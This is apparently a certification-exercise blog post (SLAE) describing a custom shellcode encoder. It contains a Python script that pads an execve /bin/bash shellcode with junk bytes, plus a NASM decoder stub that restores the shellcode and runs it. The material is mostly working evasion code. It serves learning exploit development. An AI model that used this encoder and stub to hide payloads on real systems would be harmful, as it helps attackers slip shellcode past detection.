Source: SecurityTube
OK, here I will show a simple encoder/decoder; the source code can be found on GitHub.
How the encoder works:
- Get a random number between 1 and 3 (link to the Python encoder script)
- After each shellcode byte, add the control number, then add the junk bytes
Example:
------------------------------------------------------------------
| G | C | J | J | G | C | J | J | J | G |
------------------------------------------------------------------
G - good byte, shellcode byte
C - control number: the distance to the next good byte, which lets the decoder skip the junk bytes
J - Junk bytes
#!/usr/bin/python
# Encoder half of the SLAE custom encoder exercise (the decoder is Decoder.nasm).
# Output layout, one entry per shellcode byte: G C J.. where G is the original
# byte, C is a control byte in 1..3 and C-1 junk bytes follow it.  The decoder
# treats C as the distance from C to the next G.
from random import randint


def get_random(ident):
    """Return a random int for the named range.

    'number' -> 1..3     (control byte: distance to the next good byte)
    'char'   -> 65..122  (junk byte: printable ASCII A-Z, [\\]^_`, a-z)
    Any other ident yields None, as in the original if/elif chain.
    """
    bounds = {'number': (1, 3), 'char': (65, 122)}.get(ident)
    if bounds is None:
        return None
    low, high = bounds
    return randint(low, high)


# 30-byte execve shellcode, stack version (bytes literal so bytearray() accepts
# it on both Python 2 and 3; the value is unchanged).
shellcode = (b"\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")

chunks = []
for good in bytearray(shellcode):
    chunks.append('\\x%02x' % good)
    distance = get_random('number')
    chunks.append('\\x%02x' % distance)
    # distance-1 junk bytes, so that (address of C) + C lands on the next G
    for _ in range(distance - 1):
        chunks.append('\\x%02x' % get_random('char'))
encoded = ''.join(chunks)

print(encoded)
print('')
# NASM "db" form: swap the \x prefix for ",0x" and drop the leading comma.
print(encoded.replace("\\x", ",0x")[1:])
# Each encoded byte is rendered as 4 characters ("\xNN"), hence the /4.
# The decoder's loop count must be adjusted to the printed encoded length.
print('Initial len: %d, encoded len: %d' % (len(shellcode), len(encoded) / 4))
Decoder.nasm
;-----------------------------------------------------------------------
; Decoder.nasm - decoder stub for the SLAE encoder exercise.
; Target: i386 Linux (int 0x80 ABI), NASM / Intel syntax.
;
; Encoded buffer at `shelcode` (as emitted by the Python encoder):
;   G C J.. G C J.. ...   G = shellcode byte, C = distance (1..3) from C to
;                         the next G, followed by C-1 junk bytes.
; The stub decodes in place: it walks the buffer, copies every G byte down
; to the front, then calls the now-contiguous payload.
;
; Note: the loop writes into this .text section (mov byte [esi], bl), so the
; binary only runs if the text segment is writable; the post does not show
; the nasm/ld flags used.
; Note: only the payload after `shelcode` is encoded - the jmp/call/pop and
; copy loop above it are stored as-is.
;-----------------------------------------------------------------------
section .text
global _start
_start:
    jmp short end           ; jmp / call / pop trick to get the buffer address
; Registers in the decode loop:
;   edx = address of `shelcode` (return address pushed by `call decoder`)
;   esi = write pointer: next slot for a decoded byte, starts at shelcode+1
;   edi = read pointer: the next control byte C, starts at shelcode+1
;   eax = edi + C = address of the next good byte
;   ecx = loop counter
decoder:
    xor eax, eax            ; clear the registers used below
    xor ebx, ebx
    xor edx, edx
    xor ecx, ecx
    pop edx                 ; edx = return address = `shelcode`
    push edx                ; push it back: popped into ecx for the final call
    mov esi, edx            ; esi = write pointer (destination)
    mov edi, edx            ; edi = read pointer (source)
    inc esi                 ; byte 0 is already a good byte; first write slot is +1
    inc edi                 ; +1 is the first control byte
    mov cl, 89              ; loop count = encoded length (89 bytes here).
                            ; Only original_len-1 = 29 iterations decode anything;
                            ; the remaining iterations read past the end of the
                            ; buffer (the final control byte already points one
                            ; past the db data) and overwrite the bytes after the
                            ; decoded payload. This goes unnoticed only because
                            ; execve does not return; adjust for a different payload.
restore:                    ; one iteration per good byte
    xor eax, eax
    xor ebx, ebx
    mov al, byte [edi]      ; al = C, distance to the next good byte
    add eax, edi            ; eax = edi + C = address of the next good byte
    mov bl, byte [eax]      ; bl = that good byte
    mov byte [esi], bl      ; store it at the write pointer (in-place decode)
    mov edi, eax            ; edi = position of the good byte just consumed
    inc edi                 ; ... +1 = the next control byte
    inc esi                 ; next write slot
    loop restore            ; ecx-- ; jnz restore
    pop ecx                 ; ecx = `shelcode` (pushed above)
    call ecx                ; run the decoded payload
    xor eax, eax            ; sys_exit(0) in case the payload returns
    mov al, 1
    xor ebx,ebx
    int 0x80
end:
    call decoder            ; pushes the address of `shelcode` as return address
shelcode: db 0x31,0x01,0xc0,0x03,0x7a,0x6b,0x50,0x03,0x76,0x50,0x68,0x02,0x4f,0x62,0x03,0x6c,0x49,0x61,0x01,0x73,0x01,0x68,0x02,0x54,0x68,0x01,0x62,0x03,0x5e,0x7a,0x69,0x01,0x6e,0x01,0x2f,0x03,0x54,0x48,0x68,0x01,0x2f,0x03,0x47,0x4d,0x2f,0x01,0x2f,0x01,0x2f,0x01,0x89,0x03,0x4a,0x62,0xe3,0x01,0x50,0x02,0x42,0x89,0x02,0x63,0xe2,0x02,0x62,0x53,0x03,0x4f,0x41,0x89,0x01,0xe1,0x03,0x72,0x5b,0xb0,0x03,0x48,0x66,0x0b,0x02,0x61,0xcd,0x02,0x4f,0x80,0x03,0x41,0x4e
SLAE-513
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: